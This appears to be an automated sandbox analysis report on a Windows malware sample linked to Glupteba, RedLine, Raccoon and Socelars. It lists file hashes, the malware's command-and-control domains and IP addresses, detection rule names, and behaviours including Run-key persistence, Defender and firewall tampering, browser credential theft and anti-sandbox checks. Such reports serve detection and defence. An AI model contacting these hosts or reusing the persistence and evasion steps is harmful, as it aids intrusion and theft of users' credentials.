glupteba | 036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf

Analysis

max time kernel
118s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
23-02-2022 00:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe
Size

8.3MB
MD5

d8a4f5c2f3e6bec6bdc9b8f38fcf6124
SHA1

159b526b4d6805f7b374cf90f7a7b54518f8ed3d
SHA256

036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf
SHA512

7892687920f8a63fffde5c9a1dbe0d571df8ee78257b0ca66cf26dada94354d1ff030ec5514f631257e82d8b383ff56c2b6e9a19e1f3d9107ec092630fe2a72d

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

193.178.170.120:11930

Attributes

auth_value
55d90151e4c2499c8ceb7f45dd22dc92

Extracted

Family

redline

Botnet

alltop

karinianise.xyz:80

Attributes

auth_value
6fadc2b44b16945c8f721b77e484a725

Extracted

Family

raccoon

Botnet

1c0fad6805a0f65d7b597130eb9f089ffbe9857d

Attributes

url4cnc
http://194.180.191.241/capibar
http://103.155.93.35/capibar
https://t.me/capibar

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4556-175-0x0000000002D00000-0x0000000003627000-memory.dmp	family_glupteba
behavioral2/memory/4556-177-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba
behavioral2/memory/1848-187-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba
behavioral2/memory/5348-273-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 960 3460 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	960	3460	rUNdlL32.eXe

RedLine Payload 25 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5212-213-0x0000000000330000-0x0000000000561000-memory.dmp	family_redline
behavioral2/memory/5212-225-0x0000000000330000-0x0000000000561000-memory.dmp	family_redline
behavioral2/memory/5212-226-0x0000000000330000-0x0000000000561000-memory.dmp	family_redline
behavioral2/memory/5572-238-0x0000000000580000-0x0000000000737000-memory.dmp	family_redline
behavioral2/memory/5568-237-0x0000000000D40000-0x0000000000E34000-memory.dmp	family_redline
behavioral2/memory/5572-235-0x0000000000580000-0x0000000000737000-memory.dmp	family_redline
behavioral2/memory/1284-236-0x0000000000480000-0x0000000000577000-memory.dmp	family_redline
behavioral2/memory/1284-233-0x0000000000480000-0x0000000000577000-memory.dmp	family_redline
behavioral2/memory/5568-234-0x0000000000D40000-0x0000000000E34000-memory.dmp	family_redline
behavioral2/memory/1284-249-0x0000000000480000-0x0000000000577000-memory.dmp	family_redline
behavioral2/memory/5568-254-0x0000000000D40000-0x0000000000E34000-memory.dmp	family_redline
behavioral2/memory/5572-251-0x0000000000580000-0x0000000000737000-memory.dmp	family_redline
behavioral2/memory/5572-248-0x0000000000580000-0x0000000000737000-memory.dmp	family_redline
behavioral2/memory/5148-259-0x0000000003B10000-0x0000000003B3F000-memory.dmp	family_redline
behavioral2/memory/4368-292-0x00000000009A0000-0x0000000000AA7000-memory.dmp	family_redline
behavioral2/memory/4368-315-0x00000000009A0000-0x0000000000AA7000-memory.dmp	family_redline
behavioral2/memory/4368-310-0x00000000009A2000-0x00000000009D6000-memory.dmp	family_redline
behavioral2/memory/6908-304-0x0000000000A40000-0x0000000000B3C000-memory.dmp	family_redline
behavioral2/memory/4368-305-0x00000000009A2000-0x00000000009D6000-memory.dmp	family_redline
behavioral2/memory/6908-299-0x0000000000A40000-0x0000000000B3C000-memory.dmp	family_redline
behavioral2/memory/1340-300-0x0000000000780000-0x00000000007A0000-memory.dmp	family_redline
behavioral2/memory/6908-290-0x0000000000A42000-0x0000000000A76000-memory.dmp	family_redline
behavioral2/memory/6908-287-0x0000000000A42000-0x0000000000A76000-memory.dmp	family_redline
behavioral2/memory/6908-282-0x0000000000A40000-0x0000000000B3C000-memory.dmp	family_redline
behavioral2/memory/6760-277-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 2864 created 3332	2864	WerFault.exe	rundll32.exe
PID 3040 created 5148	3040	WerFault.exe	ZkQF5B0SU36FG_P5aqhYpUY5.exe
PID 1496 created 4788	1496	WerFault.exe	y26j85o5orQWhRjG019OdhO1.exe
PID 5916 created 5304	5916	WerFault.exe	ki39HJ6ZwIVHm_gigZgUPZS4.exe
PID 5488 created 4156	5488	WerFault.exe	vZRazqC1JjHdbGBRX5CY5qkl.exe
PID 5696 created 5380	5696	WerFault.exe	MWtIGmpeRx1i_JRQoRfayaTT.exe
PID 6160 created 5292	6160	WerFault.exe	F2iBcq7qlXlEsigDUaVqAEtQ.exe
PID 6328 created 5380	6328	WerFault.exe	MWtIGmpeRx1i_JRQoRfayaTT.exe
PID 6880 created 5828	6880	WerFault.exe	ldf3XO4wpF2KeP1jUswCvirT.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 3936 created 4556 3936 svchost.exe Graphics.exe
PID 3936 created 5348 3936 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

description	pid	process	target process
PID 3936 created 4556	3936	svchost.exe	Graphics.exe
PID 3936 created 5348	3936	svchost.exe	csrss.exe

Executes dropped EXE 62 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFolder.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exep5lV_fxNgeBmvlsX0iHfEDvs.exexT8oVG7Ymi6m1fV0UMC5DZ8z.exeZkQF5B0SU36FG_P5aqhYpUY5.exey26j85o5orQWhRjG019OdhO1.exeYrl6mQelU772YDzLxKLlvTON.exeHJ82Zji5EzXgVJjXxqQFo7SK.exeJL_70clypUUuVLNEieSPeTOV.exeLPg3_wwTiU2yDi5RWc41_sb2.exehjTxpbdquBV8NC9Cey3c2qjW.exebPSpWAxIew9oHILHf3g1OKqd.exe8nN53RgEjLsU7HMfJixhS7il.exe94P2qFm5TsmeItVEkinn8Bfe.exekBDprAYWDgrekXLdLmPlvbrG.exefZUCD3AXYtPe3U3cgu57MhaF.exeyylv0bFITZ3B6YKSlojcSQEb.exe0xcuKppcvRYJEXv5vQV5b3EE.exeinjector.exeinjector.exeinjector.exevZRazqC1JjHdbGBRX5CY5qkl.exevJTNSHqpM_uXMxqzh7RXQZMP.exej9czdh4qGe3Kc5uEhqFDTMCo.exeQnA54ofVLN_vdz3XGsCEJybm.exemZkbGUdQk2vacg7qyKpG0jlH.exeldf3XO4wpF2KeP1jUswCvirT.exeh2p_WwwxN2hmoFLDtYdDzrSQ.exebPSpWAxIew9oHILHf3g1OKqd.tmpF2iBcq7qlXlEsigDUaVqAEtQ.exeki39HJ6ZwIVHm_gigZgUPZS4.exeVMK9oluwXQ9gKJjFgBGKpcLY.exeMWtIGmpeRx1i_JRQoRfayaTT.exeJL_70clypUUuVLNEieSPeTOV.exee7b5z0g1Rdi0ulaDZW_bVmBa.exeE210E.exeQnA54ofVLN_vdz3XGsCEJybm.exee7b5z0g1Rdi0ulaDZW_bVmBa.tmpldf3XO4wpF2KeP1jUswCvirT.exeFI1LI.exejg1_1faf.exekbhDLwsahLlhjOM1qB7TizoL.exeQnA54ofVLN_vdz3XGsCEJybm.exego-memexec-072329051.exeFGG59.exe858E3.exeloedwyfi.exe7IG03.exeF913702FJLD3LGI.exeInstall.exe

pid	process
1584	SoCleanInst.exe
1036	md9_1sjm.exe
860	Folder.exe
4556	Graphics.exe
1708	Updbdate.exe
2132	Install.exe
4936	Files.exe
2912	pub2.exe
4864	Folder.exe
3308	File.exe
4296	jfiag3g_gg.exe
640	jfiag3g_gg.exe
1848	Graphics.exe
5348	csrss.exe
5776	p5lV_fxNgeBmvlsX0iHfEDvs.exe
3148	xT8oVG7Ymi6m1fV0UMC5DZ8z.exe
5148	ZkQF5B0SU36FG_P5aqhYpUY5.exe
4788	y26j85o5orQWhRjG019OdhO1.exe
5212	Yrl6mQelU772YDzLxKLlvTON.exe
4984	HJ82Zji5EzXgVJjXxqQFo7SK.exe
4180	JL_70clypUUuVLNEieSPeTOV.exe
5384	LPg3_wwTiU2yDi5RWc41_sb2.exe
5364	hjTxpbdquBV8NC9Cey3c2qjW.exe
5372	bPSpWAxIew9oHILHf3g1OKqd.exe
1840	8nN53RgEjLsU7HMfJixhS7il.exe
2288	94P2qFm5TsmeItVEkinn8Bfe.exe
5500	kBDprAYWDgrekXLdLmPlvbrG.exe
2364	fZUCD3AXYtPe3U3cgu57MhaF.exe
3268	yylv0bFITZ3B6YKSlojcSQEb.exe
5360	0xcuKppcvRYJEXv5vQV5b3EE.exe
2264	injector.exe
5240	injector.exe
2376	injector.exe
4156	vZRazqC1JjHdbGBRX5CY5qkl.exe
1284	vJTNSHqpM_uXMxqzh7RXQZMP.exe
5556	j9czdh4qGe3Kc5uEhqFDTMCo.exe
1776	QnA54ofVLN_vdz3XGsCEJybm.exe
5572	mZkbGUdQk2vacg7qyKpG0jlH.exe
5828	ldf3XO4wpF2KeP1jUswCvirT.exe
5568	h2p_WwwxN2hmoFLDtYdDzrSQ.exe
5136	bPSpWAxIew9oHILHf3g1OKqd.tmp
5292	F2iBcq7qlXlEsigDUaVqAEtQ.exe
5304	ki39HJ6ZwIVHm_gigZgUPZS4.exe
4280	VMK9oluwXQ9gKJjFgBGKpcLY.exe
5380	MWtIGmpeRx1i_JRQoRfayaTT.exe
396	JL_70clypUUuVLNEieSPeTOV.exe
6508	e7b5z0g1Rdi0ulaDZW_bVmBa.exe
6608	E210E.exe
6496	QnA54ofVLN_vdz3XGsCEJybm.exe
6836	e7b5z0g1Rdi0ulaDZW_bVmBa.tmp
6864	ldf3XO4wpF2KeP1jUswCvirT.exe
6908	FI1LI.exe
6928	jg1_1faf.exe
6980	kbhDLwsahLlhjOM1qB7TizoL.exe
6760	QnA54ofVLN_vdz3XGsCEJybm.exe
1340	go-memexec-072329051.exe
4368	FGG59.exe
5684	858E3.exe
1916	loedwyfi.exe
6720	7IG03.exe
6736	F913702FJLD3LGI.exe
5792	Install.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe94P2qFm5TsmeItVEkinn8Bfe.exeHJ82Zji5EzXgVJjXxqQFo7SK.exekbhDLwsahLlhjOM1qB7TizoL.exeFolder.exeFile.exefZUCD3AXYtPe3U3cgu57MhaF.exe8nN53RgEjLsU7HMfJixhS7il.exexT8oVG7Ymi6m1fV0UMC5DZ8z.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	94P2qFm5TsmeItVEkinn8Bfe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	HJ82Zji5EzXgVJjXxqQFo7SK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	kbhDLwsahLlhjOM1qB7TizoL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	fZUCD3AXYtPe3U3cgu57MhaF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8nN53RgEjLsU7HMfJixhS7il.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	xT8oVG7Ymi6m1fV0UMC5DZ8z.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exeyylv0bFITZ3B6YKSlojcSQEb.exebPSpWAxIew9oHILHf3g1OKqd.tmpe7b5z0g1Rdi0ulaDZW_bVmBa.tmp

pid process

3332 rundll32.exe
3268 yylv0bFITZ3B6YKSlojcSQEb.exe
5136 bPSpWAxIew9oHILHf3g1OKqd.tmp
6836 e7b5z0g1Rdi0ulaDZW_bVmBa.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3332	rundll32.exe
3268	yylv0bFITZ3B6YKSlojcSQEb.exe
5136	bPSpWAxIew9oHILHf3g1OKqd.tmp
6836	e7b5z0g1Rdi0ulaDZW_bVmBa.tmp

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe858E3.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SparklingWildflower = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	858E3.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

196 ipinfo.io
197 ipinfo.io
355 ipinfo.io
401 ipinfo.io
402 ipinfo.io
30 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
196	ipinfo.io
197	ipinfo.io
355	ipinfo.io
401	ipinfo.io
402	ipinfo.io
30	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

Yrl6mQelU772YDzLxKLlvTON.exevJTNSHqpM_uXMxqzh7RXQZMP.exeh2p_WwwxN2hmoFLDtYdDzrSQ.exemZkbGUdQk2vacg7qyKpG0jlH.exeFI1LI.exeFGG59.exe858E3.exejg1_1faf.exe

pid	process
5212	Yrl6mQelU772YDzLxKLlvTON.exe
1284	vJTNSHqpM_uXMxqzh7RXQZMP.exe
5568	h2p_WwwxN2hmoFLDtYdDzrSQ.exe
5572	mZkbGUdQk2vacg7qyKpG0jlH.exe
6908	FI1LI.exe
4368	FGG59.exe
5684	858E3.exe
6928	jg1_1faf.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

JL_70clypUUuVLNEieSPeTOV.exeldf3XO4wpF2KeP1jUswCvirT.exeQnA54ofVLN_vdz3XGsCEJybm.exeloedwyfi.exe

description	pid	process	target process
PID 4180 set thread context of 396	4180	JL_70clypUUuVLNEieSPeTOV.exe	JL_70clypUUuVLNEieSPeTOV.exe
PID 5828 set thread context of 6864	5828	ldf3XO4wpF2KeP1jUswCvirT.exe	ldf3XO4wpF2KeP1jUswCvirT.exe
PID 1776 set thread context of 6760	1776	QnA54ofVLN_vdz3XGsCEJybm.exe	QnA54ofVLN_vdz3XGsCEJybm.exe
PID 1916 set thread context of 4756	1916	loedwyfi.exe	svchost.exe

Drops file in Program Files directory 5 IoCs

Processes:

xT8oVG7Ymi6m1fV0UMC5DZ8z.exeHJ82Zji5EzXgVJjXxqQFo7SK.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	xT8oVG7Ymi6m1fV0UMC5DZ8z.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	xT8oVG7Ymi6m1fV0UMC5DZ8z.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	HJ82Zji5EzXgVJjXxqQFo7SK.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	HJ82Zji5EzXgVJjXxqQFo7SK.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	HJ82Zji5EzXgVJjXxqQFo7SK.exe

Drops file in Windows directory 3 IoCs

Processes:

WerFault.exeGraphics.exe

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1496	4556	WerFault.exe	Graphics.exe
4280	4556	WerFault.exe	Graphics.exe
1536	3332	WerFault.exe	rundll32.exe
1460	4556	WerFault.exe	Graphics.exe
5012	4556	WerFault.exe	Graphics.exe
3612	4556	WerFault.exe	Graphics.exe
2972	4556	WerFault.exe	Graphics.exe
5048	4556	WerFault.exe	Graphics.exe
3840	4556	WerFault.exe	Graphics.exe
4856	4556	WerFault.exe	Graphics.exe
1268	4556	WerFault.exe	Graphics.exe
384	4556	WerFault.exe	Graphics.exe
3928	4556	WerFault.exe	Graphics.exe
1444	4556	WerFault.exe	Graphics.exe
1848	4556	WerFault.exe	Graphics.exe
4996	4556	WerFault.exe	Graphics.exe
5012	4556	WerFault.exe	Graphics.exe
640	4556	WerFault.exe	Graphics.exe
4016	4556	WerFault.exe	Graphics.exe
2024	4556	WerFault.exe	Graphics.exe
3332	4556	WerFault.exe	Graphics.exe
3928	4556	WerFault.exe	Graphics.exe
1260	1848	WerFault.exe	Graphics.exe
428	1848	WerFault.exe	Graphics.exe
2188	1848	WerFault.exe	Graphics.exe
3404	1848	WerFault.exe	Graphics.exe
4112	1848	WerFault.exe	Graphics.exe
1368	1848	WerFault.exe	Graphics.exe
5008	1848	WerFault.exe	Graphics.exe
4556	1848	WerFault.exe	Graphics.exe
1260	1848	WerFault.exe	Graphics.exe
2320	1848	WerFault.exe	Graphics.exe
4784	1848	WerFault.exe	Graphics.exe
1476	1848	WerFault.exe	Graphics.exe
4212	1848	WerFault.exe	Graphics.exe
3608	1848	WerFault.exe	Graphics.exe
2024	1848	WerFault.exe	Graphics.exe
1484	1848	WerFault.exe	Graphics.exe
5732	5348	WerFault.exe	csrss.exe
5804	5348	WerFault.exe	csrss.exe
5876	5348	WerFault.exe	csrss.exe
5932	5348	WerFault.exe	csrss.exe
6084	5348	WerFault.exe	csrss.exe
6124	5348	WerFault.exe	csrss.exe
5132	5348	WerFault.exe	csrss.exe
2076	5348	WerFault.exe	csrss.exe
4556	5348	WerFault.exe	csrss.exe
5100	5348	WerFault.exe	csrss.exe
5448	5348	WerFault.exe	csrss.exe
5472	5348	WerFault.exe	csrss.exe
5500	5348	WerFault.exe	csrss.exe
5008	5348	WerFault.exe	csrss.exe
5772	5348	WerFault.exe	csrss.exe
5808	5348	WerFault.exe	csrss.exe
4348	5348	WerFault.exe	csrss.exe
5572	5348	WerFault.exe	csrss.exe
1456	5348	WerFault.exe	csrss.exe
5360	5348	WerFault.exe	csrss.exe
4976	5348	WerFault.exe	csrss.exe
5728	5348	WerFault.exe	csrss.exe
5440	5348	WerFault.exe	csrss.exe
5560	5348	WerFault.exe	csrss.exe
1796	5348	WerFault.exe	csrss.exe
6256	5304	WerFault.exe	ki39HJ6ZwIVHm_gigZgUPZS4.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

JL_70clypUUuVLNEieSPeTOV.exepub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JL_70clypUUuVLNEieSPeTOV.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JL_70clypUUuVLNEieSPeTOV.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JL_70clypUUuVLNEieSPeTOV.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5904 schtasks.exe
4092 schtasks.exe
7060 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1468 tasklist.exe
4496 tasklist.exe

pid	process
5904	schtasks.exe
4092	schtasks.exe
7060	schtasks.exe

pid	process
1468	tasklist.exe
4496	tasklist.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3896 taskkill.exe

pid	process
3896	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Graphics.exe
